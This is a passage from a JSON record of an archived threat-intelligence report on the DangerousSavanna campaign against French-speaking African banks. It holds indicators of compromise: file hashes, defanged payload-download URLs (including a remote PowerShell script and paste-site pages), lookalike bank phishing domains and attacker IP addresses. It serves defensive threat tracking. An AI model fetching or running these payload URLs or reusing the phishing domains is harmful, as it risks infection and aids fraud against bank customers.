90b0f\r\ndaa6ce148e2b8e5fd694183338db6ec9\r\ne166ee1de912bf17453d2da1dc06fc6d\r\ne2c3a6bcb015e2e5137d4a46881d38b6\r\nf0960552876da5ef74b8ece55116929e\r\nf2afcfd2ecfb3ea3261855ce1a4747b7\r\nf4a8605fa09e447108eb714eccad57d0\r\nfae63014d33efe844a25f2606de900b6\r\niplogger[.]org/2zaEa6\r\nbit[.]ly/PDF_MicrosoftOnline\r\ncdn.filesend[.]jp/private/hTsvHkbWaUSEZ7ilocBGMTgumxqFmSrVgF-9Ht5LL6YCf4A7Eu28rIxdbo-ND_F9/Chimers.gif\r\n4sync[.]com/web/directDownload/QHZsERS6/rHb0lMWD.f2e6a9154ab6cd29b337d6b555367580\r\n4sync[.]com/web/directDownload/rE33SDmE/iNXXJkWJ.4bf28df12d9e7d99bc902edb6d23c6e2\r\nraw.githubusercontent[.]com/R3mEm/vox/main/vox.ps1\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 16 of 17\n\npaste.c-net[.]org/CookiesEstrogen\r\npaste.c-net[.]org/ExportDeposit\r\npaste.c-net[.]org/OrientalAntonio\r\npaste.c-net[.]org/ShaveDavie\r\npaste.c-net[.]org/SidingFatigue\r\npaste.c-net[.]org/HearingsGuided\r\npaste.c-net[.]org/SelvesGangster\r\npaste.c-net[.]org/StaceConcerns\r\npaste.c-net[.]org/BogeyUglier\r\npaste.c-net[.]org/MuggingFunny\r\npaste.c-net[.]org/NelsonTasteful\r\npaste.c-net[.]org/ShaveDie\r\npaste.c-net[.]org/GiovanniKismet\r\npaste.c-net[.]org/TreatsGlamour\r\npaste.c-net[.]org/NeedlessHorton\r\npaste.c-net[.]org/KillingsSucked\r\npaste.c-net[.]org/PuckerStake\r\npaste.c-net[.]org/AliacesLorean\r\npaste.c-net[.]org/MuggingFunny\r\npaste.c-net[.]org/HazelMagnets\r\npaste.c-net[.]org/AliasesKorean\r\npaste.inexa-group[.]com\r\npress.giize[.]com\r\ntf-bank[.]com\r\naeternam[.]me\r\nnedbank.za[.]com\r\nnedbankplc.4nmn[.]com\r\nsecure.graviom[.]fr\r\ni-development[.]one\r\n15.236.51[.]204\r\n3.8.126[.]182\r\n35.181.50[.]113\r\n13.37.250[.]144\r\n13.38.90[.]3\r\n137.116.142[.]70\r\n170.130.172[.]46\r\n192.18.141[.]199\r\n20.70.163[.]11\r\n192.9.244[.]42\r\n20.194.195[.]96\r\nSource: https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/"
	],
	"report_names": [
		"dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa"
	],
	"threat_actors": [
		{
			"id": "286172a2-6946-475d-a5a2-3cf985155a06",
			"created_at": "2023-01-06T13:46:39.460654Z",
			"updated_at": "2026-04-18T02:00:03.631394Z",
			"deleted_at": null,
			"main_name": "DangerousSavanna",
			"aliases": [],
			"source_name": "MISPGALAXY:DangerousSavanna",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1776306118,
	"ts_updated_at": 1776478857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f969656b2cf534dc73f76d861e789b18efead0e.pdf",
		"text": "https://archive.orkl.eu/5f969656b2cf534dc73f76d861e789b18efead0e.txt",
		"img": "https://archive.orkl.eu/5f969656b2cf534dc73f76d861e789b18efead0e.jpg"
	}
}